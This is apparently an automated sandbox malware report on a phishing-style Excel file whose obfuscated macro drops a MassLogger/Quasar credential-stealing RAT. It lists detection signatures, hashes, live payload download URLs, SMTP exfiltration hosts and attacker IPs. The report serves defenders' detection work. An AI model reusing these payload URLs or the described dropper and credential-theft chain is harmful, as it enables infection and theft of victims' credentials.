Analysis Report LIQUIDACION INTERBANCARIA 02_22_2021.xls

Overview

General Information

Sample Name: LIQUIDACION INTERBANCARIA 02_22_2021.xls
Analysis ID: 356267
MD5: 8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1: 61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256: 35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
Tags: ESPgeoOutlookxls

Detection

Hidden Macro 4.0 MassLogger RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected MassLogger RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the startup folder
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
May check the online IP address of the machine
Office process drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Beds Obfuscator
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://pastex.pro Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\a.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Joe Sandbox ML: detected
Source: C:\ProgramData\a.exe Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\CalcFis\obj\Debug\CalcFis.pdb source: a.exe, mensajeria_system[1].exe.0.dr
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\PROGRAMDATA\a.exe
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: mensajeria_system[1].exe.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\ProgramData\a.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.seyranikenger.com.tr
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.162.146.6:443

Networking:

May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 54.225.220.115 54.225.220.115
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.4:49761 -> 208.91.199.223:587
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: fUsage: https://www.youtube.com/watch?v=Qxk6cu21JSg equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.seyranikenger.com.tr
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org/
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org4
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.orgD
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify8
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp String found in binary or memory: http://pastex.pro
Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.dr String found in binary or memory: http://pastex.pro/b/AEmdBGcmp
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp String found in binary or memory: http://smtp.saleforceconsults.com
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.local
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://management.azure.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://management.azure.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://messaging.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officeapps.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk
Source: a.exe, 00000001.00000002.709635511.00000000027D3000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.772094694.00000000028B3000.00000004.00000001.sdmp, a.exe, 00000011.00000002.842665292.00000000029D3000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com4
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://settings.outlook.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://tasks.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp String found in binary or memory: https://www.digicert.com/
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/watch?v=Qxk6cu21JSg
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown HTTPS traffic detected: 185.162.146.6:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49755 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: a.exe, 00000001.00000002.708928788.0000000000AFB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Quasar RAT Author: Florian Roth
Found Excel 4.0 Macro with suspicious formulas
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Initial sample: High usage of CHAR() function: 23
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\ProgramData\a.exe Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Jump to dropped file
Detected potential crypto function
Source: C:\ProgramData\a.exe Code function: 1_2_00E6C154 1_2_00E6C154
Source: C:\ProgramData\a.exe Code function: 1_2_00E6E597 1_2_00E6E597
Source: C:\ProgramData\a.exe Code function: 1_2_00E6E598 1_2_00E6E598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAC154 11_2_00FAC154
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAE598 11_2_00FAE598
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 11_2_00FAE589 11_2_00FAE589
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD579D 13_2_02BD579D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD0740 13_2_02BD0740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16A8 13_2_02BD16A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16FC 13_2_02BD16FC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD16E7 13_2_02BD16E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD17B2 13_2_02BD17B2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD178B 13_2_02BD178B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Code function: 13_2_02BD0730 13_2_02BD0730
